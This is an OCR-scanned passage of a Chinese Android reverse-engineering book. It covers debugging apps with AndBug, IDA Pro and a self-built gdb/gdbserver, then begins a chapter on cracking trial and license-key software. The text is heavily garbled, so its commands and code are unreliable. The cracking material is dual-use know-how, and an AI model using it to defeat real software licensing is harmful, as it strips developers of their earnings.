图 8-12 ”使 用 AndBug 调 试 Android 程 序 
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使 用 AndBug 调 试 Android 程 序 时 ， 请 确保 DDMS 没 有 运行 ! 因为 AndBug 与 程序 的 JDWP 线 


程 进行 通信 时 ， 自 动 完成 了 端口 转发 ， 而 DDMS 的 端口 转发 功能 会 影响 到 AndBug 的 通信 连接 。 









































进入 Shell 环 境 后 执行 help 命 令 查 看 AndBug 支 持 的 命令 。 这 些 命令 可 
以 在 AndBug 的 /ib/andbug/cmd 目 录 下 找到 相应 的 源码 ， 有 兴趣 的 读者 可 
以 看 看 。 这 些 命 令 分 别 是 : 

break: 设置 断 点 。 

break-list: 列举 所 有 的 活动 断 点 与 钩子 。 

break-remove: 删除 断 点 或 钧 子 。 

class-trace: 方法 跟踪 ， 报 告 一 个 类 中 所 有 被 调用 的 Dalvik 方 法 。 

classes: 列表 所 有 已 加 载 的 类 。 

dump: 输出 指定 源 文件 中 所 有 的 方法 。 

exit: 中 止 调试 会 话 。 

help: 显示 帮助 信息 。 

inspect: 检查 一 个 对 象 。 

method-trace: 方法 跟踪 ， 报 告 方法 中 调用 的 Dalvik 方 法 。 

methods: 列 出 一 个 类 中 的 所 有 方法 。 

navi: 使 用 HITP 服 务 ， 文 持 通过 浏览 器 显 示 进 程 中 所 有 线程 的 状 
态 信息 。 

resume: 恢复 程序 执行 。 

shell: 为 特定 的 进程 启动 一 个 AndBug Shell。 

source: 添加 源 代码 目录 。 

statics: 列 出 一 个 类 中 的 所 有 方法 。 

suspend: 暂停 进程 中 的 线程 。 








thread-trace: 线程 跟踪 ， 报 告 进程 所 调用 的 线程 。 

threads: 列 出 进程 中 所 有 的 线程 。 

接 下 来 在 终端 提示 符 下 输入 classes 列 出 所 有 已 加 载 的 类 ， 在 其 中 可 
以 找到 android.widget.Toast 类 ， 它 的 show(0) 方 法 就 是 用 来 弹出 Toast 的 。 
输入 “break android.widget.Toast” 对 这 个 类 设置 断 点 ， 如 果 没 有 错误 会 输 
出 类 似 下 面 的 结 


>> break android.widget.Toast 
## Setting Hooks 
-- Hooked <536870916> android.widget.Toast <class 'andbug.vm.Class'> 


断 点 设置 好 后 回 到 程序 运行 界面 ， 点 击 “MethodProfiling” 按 钮 ， 
时 AndBug 会 自动 中 断 ， 终 端 提 示 符 下 会 有 如 下 输出 信息 。 


>> ## Breakpoint hit in thread <1> main (running suspended), process suspended. 














-- android.widget.Toast .makeText (Landroid/content/Context;Ljava/lang/ 
CharSeque nce;I)Landroid/widget/Toast;:0 

-- Com.droider.methodprofiling.MainActivity.c()V:3 

-- Com.droider.methodprofiling.MainActivity.b()V:0 

-- Com.droider.methodprofiling.MainActivity.a()V:0 

-- Com.droider.methodprofiling.MainActivity.access$0 (Lcom/droider/ 
methodprofiling/MainActivity;)V:0 

-- Com.droider.methodprofiling.MainActivitys$1.onClick (Landroid/view/View;) 
M2 

-- android.view.View.performClick()2zZ:14 

-- android.view.ViewsPerformClick.run()V:2 

-- android.os.Handler.handleCallback (Landroid/os/Message;)V:2 

-- android.os.Handler.dispatchMessage (Landroid/os/Message;)V:4 

-—- android.os.Looper.loop()V:75 

-- android.app.ActivityThread.mainl( [Ljava/lang/String;)V:31 

-- Java.lang.reflect.Method.invokeNative(Ljava/lang/Object; [Ljava/lang/ 
Object; Ljava/lang/Class; [Ljava/lang/Class;Ljava/lang/Class;IZ)Ljava/ 
lang/Object; <native> 

-- java.lang.reflect.Method.invoke (Ljava/lang/Object; [Ljava/lang/Object;) 
Ljava 
/lang/Object;:18 

-- Com.android.internal .os.ZygoteInit$MethodaAndaArgsCaller.run()V:11 

-- Com.android.internal.os.ZygoteInit.main([Ljava/lang/Sstring;)V:84 
dalvik.system.NativeStart.main([Ljava/lang/String;)V <native> 


输 出 的 内 容 与 栈 跟 踩 法 中 使 用 printStackTrace0 的 输出 结果 是 一 样 
的 。 接 下 来 执行 resume 命 令 让 程序 恢复 执行 ， 然 后 执行 navi 命 令 开局 


HTTP 服 务 ， 打 开 浏 览 器 并 输入 http://localhost: 8080， 如 图 8-13 所 示 ， 浏 
唤 器 显示 了 OnClick0) 方 法 执行 后 的 Main 线 程 的 栈 跟 踊 信 息 。 


人 信人 AndBug Navi - Mozilla Firefox 


File Edit View History Bookmarks Tools Help 


; AndBug Navi 
localhost v€| | Q| 合 
售 androguard 个 apkinspector 候 droidbox 个 dex2jar 个 smaii 个 apktool (ded 蝙 Android Developers 


Thread: <1> main (running suspended) 
EA 
this= 
context= 


a.W.T.makeText:2 
duration= 
text= 
context= 


c.d.m.M.c:3 
this= 


c.d.m.M.b:0 
thiss= 


c,.d.m.M.a:0 
this= 


.M.access$0:0 
.m.M.onClick:2 


this= 








图 8-13 ”通过 浏览 器 访问 进程 状态 


由 于 AndBug 不 支持 单 步调 试 Android 程 序 ， 并 且 无 法 对 自 定义 的 方 
法 设置 断 点 ， 因 此 ， 在 使 用 过 程 中 可 能 会 感到 诸多 不 便 ， 该 者 在 分 析 程 
序 过 程 中 可 以 根据 实际 需要 使 用 它 ， 另 外 ，AndBug 是 一 个 脚本 式 的 调 
试 句 ， 人 允许 分 析 人 员 编写 脚 本 来 扩展 它 ， 有 兴趣 的 读者 可 以 深入 地 研究 
= 下。 











8.5 ”使 用 IDA Pro 调 试 Android 原 生 程序 


IDA Pro 从 6.1 版 本 开始 ， 支 持 动 态 调 试 Android 原 生 程 序 。 本 节 将 通 
过 两 个 实例 来 介绍 ， 如 何 使 用 IDA Pro 来 动态 调试 一 般 的 Android 原 生 程 
序 〈 如 /system/bin 下 提供 的 adbd) 与 apk 中 打包 的 so 动态 链接 库 。 





8.5.1 调试 Android 原 生 程 序 








调试 一 般 的 Android 原 生 程序 可 以 采用 远程 运行 与 远程 附加 两 种 方 
式 来 调试 ， 远 程 附 加 调试 将 在 下 一 小 节 调 试 动 态 链接 库 时 介绍 ， 本 小 节 
介绍 如 何以 远程 运行 的 方式 来 调试 原生 程序 。 

将 本 小 节 的 实例 程序 debugnativeapp 复 制 到 Android 设 备 中 ， 

如 /data/localMtmp 目 录 ， 接 着 将 IDA Pro 软 件 目录 的 android_server 复 制 到 
Android 设 备 中 ， 本 实例 演示 时 同样 放 到 了 /data/localytmp 目 录 ， 在 命令 
提示 符 下 执行 以 下 两 行 命令 给 两 个 文件 加 上 可 执行 权限 。 

adb shell chmod 755 /data/local/tmp/debugnativeapp 


adb shell chmod 755 /data/local/tmp/android_ server 


接着 执行 “adb shell/data/local/tmp/android_server”， 局 动 IDA Pro 的 
Android 调 试 服务 器 ， 会 输出 如 下 信息 。 
C:\ >adb shell /data/local/tmp/android server 


IDA Android 32-bit remote debug server (ST) v1.14. Hex-Rays (c) 2004-2011 
Listening on port #23946... 


程序 提示 调试 服务 器 已 经 启动 ， 并 且 监 听 了 23946 号 端口 。 打 开 另 
一 个 命令 提示 符 执 行 以 下 命令 开局 端口 转发 。 

adb forward tcp:23946 tcp:23946 

现在 启动 DA ” Pro 主 程序 ， 点 击 亲 单项 “Debugger Run -> Remote 
ArmLinux/Android debugger”"， 打 开 调 试 程序 设置 对 话 框 。 在 Application 
一 栏 中 输入 “/data/local/tmp/debugnativeapp”， 在 Directory 一 栏 中 输 








入 “/data/local/tmp/”， 在 HostName 一 栏 中 输入 localhost， 如 图 8-14 所 示 。 
% Debug application setup: arnmlinux 


Application |/data/local/tmp/ debuenativeapp 





Directory |f dataflocal/ tap 


Parameters | 


Debug options 


Hostname |localhost 





| Port |23946 


Password v 


| Save network settines as default 


图 8-14 ”调试 程序 设置 对 话 框 











设置 完成 后 点 击 OK 按 钮 ，IDA Pro 就 会 远程 的 执行 debugnativeapp， 
并 自动 切换 到 调试 界面 ， 如 图 8-15 所 示 ，IDA Pro 中 断 在 了 main0O 函 数 的 
入 口 处 。 





入 IDA — /data/local/tap/debugnativeapp 
File Edit View Deba 
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图 8-15 ”IDA Pro 调 试 器 界面 


有 过 Windows 平 台 软 件 调试 经 历 的 读者 一 定 对 这 种 调试 界面 不 会 感 
到 陌生 ，Ollydbg 调 试 右 的 界面 布局 就 与 它 非 常 相 似 。 接 下 来 就 可 以 在 
有 反 汇 编 代码 窗口 按 下 F7 (Step info) 或 F8 (Step over) 来 单 步调 试 原 生 
Ry 


8.5.2 ”调试 Android 原 后 动态 链接 库 


调试 Android 原 生动 态 链接 库 需 要 先 安装 并 运行 包含 该 动态 链接 库 
的 程序 。 然 后 使 用 IDA ” Pro 远程 附 加 程序 进程 的 方式 来 进行 调试 。 安 装 
本 小 节 的 实例 程序 debugjniso.apk 并 运行 ， 界 面 如 图 8-16 所 示 。 点 击 “ 设 
置 标题 ”按钮 后 ， 程 序 会 调用 动态 链接 库 libdebugjniso.so 中 的 jniString0 方 
法 返回 一 个 字符 串 ， 然 后 调用 setTitle0) 方 法 设置 程序 的 标题 栏 。 现 在 我 
们 的 需求 是 ， 动态 调试 libdebugjniso.so 中 jniString0) 方 法 的 执行 过 程 。 

















Wl 5554: Android2. 3.3 


Debugjniso 





图 8-16 ”Debugjniso 运 行 界面 


执行 以 下 命令 启动 IDA Pro 的 Android 调 试 服务 器 。 
adb shell /data/local/tmp/android server 
命令 执行 成 功 后 会 监听 23946 端 口 ， 在 命令 行 下 执行 以 下 命令 进行 





端口 转发 。 
adb forward tcp:23946 tcp:23946 
启动 IDA Pro 主 程序 ， 点 击 表 单 项 “Debugger-, Attach “Remote 


ArmLinux/Android debugger”， 打 开 调 试 程序 设置 对 话 框 。 在 HostName 
一 栏 中 输入 localhost， 如 图 8-17 所 示 。 


5 Debug application setup: armlinuz 


Hostname localhost WW Port |23946 v 





Password | v 


国 Save network settlngs as default 


图 8-17 调试 程序 设置 对 话 框 


点 击 OK 按 钮 ，IDA “Pro 会 连接 远程 的 Android 调 试 服务 器 ， 稍 等 片 
刻 ，IDA Pro 会 弹出 附加 进程 对 话 框 ， 如 图 8-18 所 示 。 











Choose process to attach to 


com, androld. protips 
fsystem/bin/vold 
/system/bin/netd 
com, android. music 
fsystem/bin/ debuegerd 
com, android. mms 
/system/bin/rild 
zygote /bin/app_process -Xzryeote /system/bin --ryeot""" 
com, android. email 
/system/bin/mediaserver 
fsystem/bin/installd 
/system/bin/keystore /data/misc/keystore 
com. android,. defcontainer 
/system/bin/ qemud 
com. svox. pico 
/system/bin/ sh 
/sbim adbd 
416 /system/bin/sh -ec “logcat ~v Long” 
logcat -Y longe 
fsystem/binvsh -~c /dataflocal/tmp/ android server 


system_ server 


Line 30 of 34 





图 8-18 ”附加 进程 对 话 框 


为 了 确保 调试 器 附加 成 功 后 libdebugjniso.so 已 经 被 加 载 到 内 存 中 ， 
此 时 可 以 在 程序 中 点 击 一 次 “设置 标题 ”按钮 来 让 系统 加 载 它 。 选 择 
com.droider.debugjniso 进 程 ， 点 击 OK 按 钮 后 稍 等 片刻 IDA Pro 会 进入 调 
试 器 界面 ， 但 此 时 的 代码 不 是 运行 在 动态 链接 库 的 领空 ， 要 想 调试 动态 
链接 库 还 得 为 动态 链接 库 中 的 函数 设置 晰 点 。 将 debugjniso.apk 程 序 中 的 
libdebugjniso.so 文 件 解压 到 本 地 磁盘 ， 开 局 另 一 个 IDA ”Pro 实 例 并 载 入 
它 ， 找 到 jniString0 方 法 的 代码 如 下 : 











.text:00000C38 Java_com _ droider_debugjniso_TestJniMethods_jnistring 


.text:00000C38 LDR R1, =(aFAxeNativemeth - 0xC4C) 
.text:00000C3C STMFD SP!, {R4,LR)} 

.text:00000C40 LDR R3, [RO] 

.text:00000C44 ADD RE PG RI 

.text:00000C48 MOV LR, PC 

.text:00000C4C LDR PG [Ra37FOX29G] 

.text:00000C50 LDMFD SPL TRAaEed 


从 上 面 的 有 反 汇 编 代 码 中 可 以 看 出 ，jniString0 方 法 的 代码 起 始 处 位 于 
0xC38， 回 到 IDA Pro 调试 窗口 ， 按 下 快捷 键 CTRL+S 打 开 段 选择 对 话 
框 ， 查 找 libdebugjniso.so 动 态 链 接 库 的 基地 址 ， 笔 者 本 机 上 它 的 值 为 
0x80500000， 如 图 8-19 所 示 。 





35| Choose segnent 


Start End 
30000000 800A2000 
800A2000 800A9000 
debua031 300A9000 S00ABONO 
|as| libnfe ndef. so 80100000 80101000 
as3| libnfe ndef. so 80101000 80102000 
|as| 1ibstagefright_en…。 80200000 80201000 
|as| libstagefright_en… 30201000 80202000 
lasl Libstagefright_fo… 80300000 80309000 
|as| 1ibstagefright_fo… 80309000 8030A000 
ealloc. default. so 80400000 80402000 
全 alloc. default. so 80402000 80403000 
80500000 80503000 
|as| libdebugjniso. so 80503000 80504000 
|as| libstlport. so 9D100000 9D0139000 
|as| libstlport. so 90139000 90138B000 
|as| libjpeg. so gn700000 gn732000 
| 全 | libjpeg. so 90732000 90733000 
as| libstagefrieht.so A2FONOOO A306D0000 
|a | libstagefrieht. so A30B0000 A306ADDO 


Base TYpe Class 
Public COLDE 
Public CODE 
Public CODE 
Public CODE 
Fublic CODE 
Public CODE 
public CODE 
publie CODE 
publie CODE 
Fublic CODE 
Fublic CODE 





byte public 
byte publie 
byte Fublic 
byte Public 
byte Public 
byte Publie 


R 
了 及 
及 
KE 
RE 
EK 
ER 
玉 
玉 
玉 
玉 
ER 
及 
RE 
EK 
RE 
RK 
KE 
EK 
RE 


ba pp 
Doc 


byte public 








图 8-19 ”上 段 选 择 对 话 框 


根据 内 存 地 址 = 基地 址 + 偏 移 地 址 的 计算 方法 ， 可 以 得 出 jniString() 
方法 的 内 存 地 址 为 0x80500c38。 点 击 界面 上 OK 或 Cancel 按 钮 关闭 段 选 择 
对 话 框 ， 然 后 按 下 快捷 键 G， 打 开 地 址 跳 转 对 话 框 ， 在 “Jump 
Address” 一 栏 中 输入 0x80500c38， 如 图 8-20 所 示 。 


Junp to address 





JTump address 80500c38 





图 8-20 “地址 跳 转 对 话 框 





点 击 OK 按 钮 后 ，IDA Pro 会 跳 转 到 jniString(0) 方 法 所 在 的 代码 行 ， 并 
日 己 分 析出 了 jniString0 方 法 的 代码 ， 在 0x80500c358 行 上 按 上 快捷 键 F2 
设置 一 个 断 点 ， 此 时 被 设置 断 点 的 代码 行 会 以 红色 显示 ， 如 图 8-21 所 
pa 





A IDA - C:\DOCUNE 1\ADEINI I\LOCALS I\Temp\idal3779, idb (app_process) 
File Edit Jonp Search Yiew Debyeser fptions Kindows Help 





> @ Oemot MLime/ na 司 久 他 ;有 镁 引 有 本 图 国 全 咱 叶 














请 IDA WiwrPC，General registers Modules, Thresds, Hex View-l, Stwck vie 上 回国 Structurss Enmns 
Im merEc 要 Xx 对 cueral regizters Bx 
libdebugjniso.so:88598C38 SRO FFFFFFFC % 和 NN 1 过 
libdebugjniso.so:88508C38 ; == = == SUBROUTINHE = = az z 0 | 
R1 BERCR2E8 Stack] :BEACA2ES 
libdebugjniso.so:88598C38 R2 090000010 中 I C 0 
libdebugjniso.so:88588C38 se ly 日 
libdebugjniso.so:80599C38 Java com droider debugjniso TestJniMethods jnistring < 型 jp sa 一 
ry BilModules Sx 
libdebugjniso.so:86586C3C STMFD SPY, {Rs,LRY 
* libdebugjniso.so:88598Ch9 LDR R3, [RS] Poth Dese Size_ A 
.50:885080C4h ADD R1, Eh R1 ; " 尝 灶 yyHativeMethod” BE /systen/bin/spp process 00006000 3 
88500C48 HOU LR erate/liwalihtm se 80000000 
80500ChC LDR PC, [3, dex29c 一 一 
865096C58 LDMFD SPY，《R4,PC》 Re 
; End of Function Java_com droider debugjniso_TestJniMethods jniString Tos Sx 
Decinsl Hex State | 
libdebugjniso.so:895969C59 ; 到 44 Ig Ready 
3 19 Ready 
UNFNOWN 80500C38: Java com droider debugjniso TestiniNethods jniString 辟 向 4l2 19 -Resiy | 
<《 dl 19 Besty ~ 
可 Hex Viewl x stk vie x 
BEACAFFG® [WH] 76 79 SF 70 72 6F 63 65 73 73 46 08 68 99 99 app_process..... ~ BEACA2B8 
BEACA2BC 00000060 
"UNKNOWN BEACAFFO: [stack]:BEACAFFO | UNKNOWN BEACA2B6: [stack]:BEACA2BS 
二 gx 
Compiling 天 'Y; Mtools\ 静 考分 析 Vida61\idc\onload, idc'，.， 
Executing function ‘OnLoad',.. 
IDA 13 analysing che input file... 
You may start to explore the input file right novw. 
LoadLibrary(Y:\cools\ 静 疙 分 析 \1da6lVpluginsVpychon.plw) error: 找 不 到 指定 的 模块 ， 
Y:Vrools\ 甫 坊 分 析 \1da51VPluginsVpYthon.plw: can'c load file 
UniCodeString Bh4ck.wg: could not load plugin 
22:19:07 zynanics BlnDiff 4.0.1 15146 (Dec 21 2011) - (c)2004-2011 Google Inc. 
22:19:07 Error: Could not load configuration file, akipping plugin 
The initial autoanalysis hes been finished. | 





me 
AU: idie Dowm Disk: 268 








图 8-21 ”使 用 IDA Pro 调 用 原生 动态 链接 库 


断 点 设置 好 后 ， 回 到 程序 中 点 击 “* 设 置 标题 ?按钮 ， 程 序 就 会 中 断 在 
0x80500c358 行 上 ， 接 下 来 的 调试 步 又 就 和 调试 原生 程序 是 一 样 了 。 


8.6 ”使 用 gdb 调 试 Android 原 生 程序 





本 小 节 将 介绍 在 没有 程序 源码 的 情况 下 ， 如 何 使 用 gdb 配 合 
gdbserver 进 行 Android 原 生 程 序 的 汇编 级 调试 。 


8.6.1 ”编译 gdb 与 gdbserver 


Android 系 统 采用 gdb 〈The GNU Project Debugger，GNU 工 程 调 试 
器 ) 作为 原生 程序 的 调试 器 ，Android NDK 根 目录 下 的 ndk-gdb 与 
toolchains/arm-linux-androideabi-4.4.3/prebuilUylinux-x86/bin 目录 下 的 arm- 
linux-androideabi-gdb 都 可 以 用 来 调试 Android 原 生 程序 。 但 这 两 个 程序 
是 动态 编译 的 ， 不 包含 符号 信息 ， 调 试 时 需要 设置 Android 系 统 动态 链 
接 库 的 符号 加 载 路 径 ， 并 且 只 能 调试 拥有 调试 信息 的 原生 程序 ， 而 一 般 
情况 下 ， 使 用 Android NDK 编 译 的 原生 程序 都 不 包含 调试 信息 ， 因 此 无 
法 使 用 官方 自 带 的 gdb 来 对 原生 程序 进行 汇编 级 调试 。 

接 下 来 我 们 要 动手 编译 一 个 静态 版 本 的 gdb 调 试 器 。 首 先 到 gdb 的 官 
网 下 载 gdb 的 源码 ， 笔 者 下 载 的 版 本 为 7.3.1， 下 载 地 址 为 : 
ftp://sourceware.org/pub/gdb/releases/gdb-7.3.1.tar.gz。 下 载 完 成 后 将 源码 
解压 。 在 终端 提示 符 执 行 以 下 命令 安装 编译 gdb 所 需 的 软件 包 。 

sudo apt-get install bison flex libncurses5-dev texinfo gawk libtool 

编译 gdb 时 不 要 使 用 自 带 的 多 线程 库 thread_db.c， 而 应 使 用 Android 
NDK 中 的 修改 版 本 ， 位 于 Android NDK 的 
sources/android/libthread_db/gdb-7.3.x/libthread_db.c， 为 了 避免 兼容 性 问 
题 ， 笔 者 将 其 编译 成 了 静态 库 ， 配 置 gdb 编 译 脚 本 如 下 撰写 本 章 时 
Android “NDK 己 经 更 新 到 r8b 版 本 ， 该 版 本 的 NDK 提 供 了 最 新 7.3.x 版 本 
的 libthread_db.c 文 件 ， 笔 者 使 用 此 版 本 的 Android NDK 编 译 gdb) 。 








export TOOLCHAIN_PATH=/home/android/tools/android/ 
android-ndk-r8b/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86 

export PATH=$TOOLCHAIN_ PATH/bin:s$PATH 

export SYSROOT=/home/android/tools/android/android-ndk-r8b/platforms/android-14/ 

arch-arm 

export TOOLCHAIN_ PREFIX=$TOOLCHAIN_ PATH/bin/arm-linux-androideabi 

export CC="$TOOLCHAIN_PREFIX-gcc --sysroot=$SYSROOT" 

export AR="$TOOLCHAIN_PREFIX-ar" 

$CC -Oo $SYSROOT/usr/lib/libthread db.o -c /home/android/tools/android/ 
android-ndk-r8b/sources/android/libthread db/gdb-7.3.x/libthread db.c 

$AR -r $SYSROOT/usr/lib/libthread db.a $SYSROOT/usr/lib/libthread db.o 

# 配 置 gdqb 编 译 脚本 

./configure --target=arm-elf-linux --enable-static --disable-stripping -withb 

-libthread-db 
=$SYSROOT/usr/lib/libthread_ db.a 


“--target=arm-elf-linux” 指 定 了 被 调试 的 程序 运行 的 系统 平台 ，“-- 
enable-static" 指 定 了 静态 编译 ,，“--disable-stripping” 指 定 禁止 剥离 符号 信 
息 ， ae oN 笔者 的 编译 环境 为 
Ubuntu “10.04， 在 终端 提示 符 下 依次 执行 以 上 命令 后 会 生成 makefile 文 
件 ， 接 下 来 还 需要 手动 修改 gdb-7.3.1/gdb 目 录 下 的 remote.c 文 件 。 找 到 
process_g_packet() 函 数 的 代码 ， 将 以 下 的 内 容 : 


if (buf_ len > 2 * rsa->sizeof_g_packet) 





error (_("Remote 'g' packet reply is too long: %s"), rs->buf),; 


修改 为 ; 


if (buf len > 2 * rsa->sizeof g packet) { 
rsa->sizeof_g_packet = buf_len; 
foE {1 3 OF HH 2: dbarch Num redgs (qdbareh) # ++} :4 
if (rsa->regs[i] .pnum == -1) 
continue; 


if (rsa->regs[i] .offset >= rsa->sizeof g packet) 


rsa->regs[i].in g packet = 0; 
else 
rsa->regs[i].in g packet = 1; 





修改 完成 后 保存 退出 ， 在 终端 提示 符 下 执行 make 命 令 开始 编 译 
gdb， 稍 等 片刻 就 会 在 gdb-7.3.1/gdb 目 录 下 生成 gdb 可 执行 程序 。 

单独 使 用 gdb 还 不 能 调试 Android 原 生 程序 ， 还 需要 编译 gdbserver。 
gdbserver 的 源码 位 于 gdb-7.3.1/gdb/gdbserver 目 录 ， 在 终端 提示 符 下 进入 
此 目录 依次 执行 以 下 命令 来 配置 gdbserver 编 译 脚 本 。 


export CC="$TOOLCHAIN PREFIX-gcc --sysroot=$SYSROOT" 

export CFLAGS="-02 -D__ANDROID_ _ -DANDROID -DSTDC_HEADERS -D__GLIBC _" 
./configure --host=arm-linux-androideabi --with-libthread-db=$SYSROOT/ 
usr/lib/libthread db.a 


命令 执行 完成 后 会 在 gdb-7.3.l/gdb/gdbserver 目 录 下 生成 makefile 文 
件 ， 打 开 该 文件 找到 WERROR_CFLAGS 的 定义 ， 将 它 的 值 清空 ， 然 后 
打开 config.h 文 件 ， 将 “/* #undef HAVE_LWPID_T */” 改 为 “#define 
HAVE_LWPID_T 1”， 修 改 完 成 后 保存 退出 ， 然 后 在 终端 提示 符 下 执行 
make 命 令 开 始 编译 gdbserver， 稍 等 片刻 就 会 在 gdb-7.3.1/gdb/gdbserver 目 
录 下 生成 gdbserver 可 执行 程序 。 

将 gdb 与 gdbserver 复 制 一 份 出 来 ， 以 备 下 一 小 节 使 用 ， 本 书 的 配套 
源 代码 中 提供 了 编译 好 的 gdb7.3 与 gdb7.5 的 可 执行 文件 ， 读 者 在 使 用 
前 ， 需 要 按照 前 面 的 步骤 安装 好 gdb 所 需 的 软件 包 。 











8.6.2 ”如 何 调试 


本 小 节 采 用 8.5.1 节 的 debugnativeapp 程 序 作 为 演示 实例 。 在 终端 提 
示 符 下 执行 以 下 两 条 命令 将 debugnativeapp 与 gdbserver 复 制 到 Android 设 


备 的 /data/local/tmp 目 录 。 
adb push debugnativeapp /data/local/tmp 





adb push gdbserver /data/local/tmp 

执行 以 下 两 行 命令 给 两 个 文件 加 上 可 执行 权限 。 

adb shell chmod 755 /data/local/tmp/debugnativeapp 
adb shell chmod 755 /data/local/tmp/gdbserver 


接着 执行 “adb shell/data/local/tmp/gdbserver :12345 


/data/local/tmp/debugnativeapp”， 启 动 gdb 调 斌 服务器， 会 输出 如 下 信 
居 。 
Process /data/local/tmp/debugnativeapp created; pid = 292 
Listening on port 12345 
程序 提示 调试 服务 局 已 经 月 动 ， 并 且 监 听 了 12345 号 端口 。 打 开怀 
一 个 终端 窗口 执行 以 下 命令 开局 端口 转发 。 
adb Oui top123495, Eeps12345 
在 PC 端的 终端 提示 符 下 执行 ./gdb 启 动 gdb 调 试 器 ， 然 后 执行 以 下 命 
令 连 接 gdb 调 试 服务 器 。 


target remote localhost:12345 


命令 执行 后 会 有 如 下 输出 。 


(gdb) target remote localhost:12345 





Remote debugging using localhost:12345 

warning: Can not parse XML target description; XML support was disabled at 
compile time 

0xb0001000 in ?2? () 

(gdb) 


使 用 IDA Pro 或 objdump 找 到 程序 mainO 函 数 的 地 址 ， 本 实例 为 
0x8580。 在 gdb Shell 环 境 下 执行 命令 “b *0x8580” 在 main() 函 数 的 第 一 行 
上 设置 断 点 ， 输 出 信息 如 下 。 

(gdb) b *0x8580 

Breakpoint 1 at 0x8580 

(gdb) 

断 点 设置 完成 后 输入 continue 让 程序 继续 执行 。 输 出 信息 如 下 。 


(gdb) continue 

Continuing. 

Program received signal SIGSEGV, Segmentation fault. 
Ox00008584 1in ?? () 

执行 “set disassemble-next on” 设 置 反 汇编 显示 代码 ， 然 后 执行 “disas 


0x8580,+20” 显 示 0x8580 以 下 20 个 字符 的 反 汇 编 代 码 ， 输 出 信息 如 下 。 











(gdb) disas 0x8580,+20 
Dump of assembler code from 0x8580 to 0x8594 : 
OX00008580 Lar EQ [Be, $16] ; Ox8598 
=> 0x00008584: push 1 
0x00008588: add r0, pc, r0 
0x0000858c: bl 0x84f8 
0x00008590: mov r0, #0 
End of assembler dump. 
(gab) 
接 下 来 可 以 输入 si 或 ni 命令 来 单 步调 试 了 ， 也 可 以 输入 读者 熟悉 的 
其 它 gdb 命 令 进行 调试 。 整 个 调试 界面 如 图 8-22 所 示 。 


HO@O@ android@honeynet: ~/gdb-7.3.1/gdb 
File Edit View Terminal Help 








(gdb) continue 
Continuing. 


Program received signal SIGSEGV, Segmentation fault. 

Ox00008584 in ?? () 

(gdb) set disassemble-next on 

(gdb) disas Ox8580,+20 

Dump of assembler code from Ox8580 to QOx8594: 
Ox00008580: ldr rg, [pCc, #16] ; Ox8598 

=> Ox00008584: push {r4, Lr} 


0x00008588: add re, pc, re 
Ox00006858c: bl Ox84f8 
Ox00008599: mov ro, #0 
End of assembler dump. 
(gdb) info registers 
6x1 1 
6xbea33cCcC4 3198368964 
Oxbea33ccc 3198368972 
Ox4000800c 1673774664 
6x8564 34148 
8Xx1 1 
gxafd41504 2949911812 
8xbea33CCC 3198368972 
6Xx9 




















图 8-22 ”使 用 gdb+gdbserver 调 试 Android 原 生 程 序 











8.7 本章 小 结 


第 9 章 ”Android 软 件 的 破解 拉 术 


本 章 将 介绍 Android 平 台 上 形形色色 的 商业 软件 所 使 用 的 保护 手 
段 ， 以 及 针对 它们 的 破解 方法 。 在 开始 阅读 前 ， 读 者 应 该 明确 目 己 的 学 
习 目 的 与 用 途 ， 本 章 介绍 的 内 容 不 是 教 读者 如 何 去 破 解 别 人 开发 的 软 
件 ， 而 是 让 更 多 的 人 能 够 了 解 到 软件 破解 的 本 质 ， 只 有 从 根本 上 了 解 了 
这 种 技术 ， 才 能 更 好 地 保护 自己 的 劳动 成 果 。 


9.1 试用 版 软件 


免费 试用 版 软件 是 Android 平 台 上 比较 常见 的 一 种 商业 软件 ， 这 种 
软件 的 目 我 保护 能 力 一 般 较 弱 ， 通 币 可 以 手动 破解 邱 。 


9.1.1 试用 版 软件 的 种 类 


Android 平 台 的 试用 版 软件 大 致 可 以 分 为 三 类 : 免费 试用 版 、 沽 示 
版 与 限制 功能 免费 版 。 

免费 试用 版 的 软件 通常 有 一 个 免费 使 用 期 限 或 次 数 的 限制 ， 当 达到 
了 使 用 期 限 或 软件 的 免费 次 数 使 用 完 后 ， 软 件 会 提示 软件 免费 试用 过 
期 ， 然 后 提醒 用 户 购买 软件 。 

演示 版 软件 一 般 只 提供 了 软件 的 部 分 功能 供用 户 使 用 ， 此 类 软件 通 
常 是 “免费 ”的 ， 用 户 要 想 使 用 软件 的 全 部 功能 则 需要 回 软 件 作 者 购买 正 
式 版 的 软件 ， 作 者 会 提供 完整 版 的 安装 包 及 使 用 授权 。 

限制 功能 免费 版 的 软件 通 营 将 软件 根据 功能 分 成 几 个 级 别 ， 例 如 免 
费 版 、 局 级 版 、 专 业 版 等 。 人 免费 版 只 提供 最 基础 的 功能 ， 而 专业 版 或 融 
级 版 则 提供 更 多 或 者 全 部 的 软件 功能 ， 根 据 作 者 的 授权 风格 不 同 ， 这 三 
种 级 别 的 软件 可 能 使 用 同一 个 软件 安装 包 ， 通 过 不 同 的 授权 来 区 别 使 用 
权限 ， 或 者 使 用 不 同 的 安装 包 提 供 不 同 的 软件 功能 。 








9.1.2 ”实例 破解 一 一 针对 授权 KEY 方 式 的 破解 


破解 试用 版 软件 的 前 提 是 试用 版 软件 中 提供 了 软件 的 完整 功能 ， 个 
则 ， 即 使 解除 了 软件 的 授权 限制 也 无 法 使 用 完整 的 功能 ， 就 失去 了 破解 
的 意义 。 


本 实例 的 演示 程序 为 一 个 限制 功能 免费 版 程序 ， 提 供给 普通 用 户 的 
只 有 和 免费 版 功能 ， 软 件 运 行 界面 如 图 9-1 所 示 。 用 户 可 以 同 软件 作者 购 
买 高 级 版 或 专业 版 的 使 用 授权 ， 作 者 将 会 给 用 户 提 供 一 个 拥有 授权 KEY 
的 apk 文 件 ， 当 用 户 安装 授权 文件 后 ， 即 可 使 用 高 级 版 或 专业 版 的 全 部 
功能 。 


Android 安 全 软件 免费 版 














图 9-1 限制 功能 免费 版 演示 程序 


安装 专业 版 的 授权 KEY 后 ， 运 行 本 软件 界面 如 图 9-2 所 示 。 
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图 9-2 ”安装 专业 版 授权 KEY 后 软件 的 运行 界面 


我 们 现在 的 需求 是 : 不 安装 授权 KEY， 使 用 软件 专业 版 的 所 有 功 











能 。 

既然 软件 可 以 通过 授权 KEY 来 使 用 不 同 的 功能 ， 说 明 软 件 本 号 是 拥 
有 完整 功能 代码 的 ， 只 是 使 用 一 些 手段 “隐藏 "起 来 了 。 下 面 我 们 反 编 译 
